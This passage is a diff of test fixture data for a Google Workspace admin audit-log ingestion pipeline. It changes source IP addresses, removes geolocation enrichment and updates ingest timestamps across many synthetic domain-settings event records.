[ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2823,35 +2211,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091294800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", + "ingested": "2021-12-09T13:38:31.915928800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "DELETE_PLAY_FOR_WORK_TOKEN", "id": "1", @@ -2881,7 +2251,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2905,35 +2275,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091311Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915933200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VIEW_DNS_LOGIN_DETAILS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VIEW_DNS_LOGIN_DETAILS", "id": "1", @@ -2963,7 +2315,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2987,35 +2339,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091315500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915938Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_LOCALE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_DEFAULT_LOCALE", "id": "1", @@ -3045,7 +2379,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3069,35 +2403,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091330700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915942500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_DEFAULT_TIMEZONE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_DEFAULT_TIMEZONE", "id": "1", @@ -3127,7 +2443,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3151,35 +2467,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091336300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.915946900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_NAME", "id": "1", @@ -3209,7 +2507,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3233,35 +2531,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091350700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.915950700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_PRE_RELEASE_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_ENABLE_PRE_RELEASE_FEATURES", "id": "1", @@ -3291,7 +2571,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3315,35 +2595,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091355700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915954800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DOMAIN_SUPPORT_MESSAGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_DOMAIN_SUPPORT_MESSAGE", "id": "1", @@ -3373,7 +2635,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3397,35 +2659,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091359Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915959500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "ADD_TRUSTED_DOMAINS", "id": "1", @@ -3455,7 +2699,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3479,35 +2723,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091362200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915963600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REMOVE_TRUSTED_DOMAINS", "id": "1", @@ -3537,7 +2763,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3561,35 +2787,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091365100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915968700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_EDU_TYPE", "id": "1", @@ -3619,7 +2827,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3643,35 +2851,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091367900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.915974600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_ENABLE_OAUTH_CONSUMER_KEY", "id": "1", @@ -3702,7 +2892,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3726,35 +2916,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091370600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.915980300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SSO_ENABLED", "id": "1", @@ -3785,7 +2957,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3809,35 +2981,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091373400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.915986300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SSL", "id": "1", @@ -3868,7 +3022,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3890,35 +3044,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091376200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", + "ingested": "2021-12-09T13:38:31.915992Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", "provider": "admin", "action": "CHANGE_EU_REPRESENTATIVE_CONTACT_INFO", "id": "1", @@ -3948,7 +3084,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3967,35 +3103,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091379100Z", - "original": 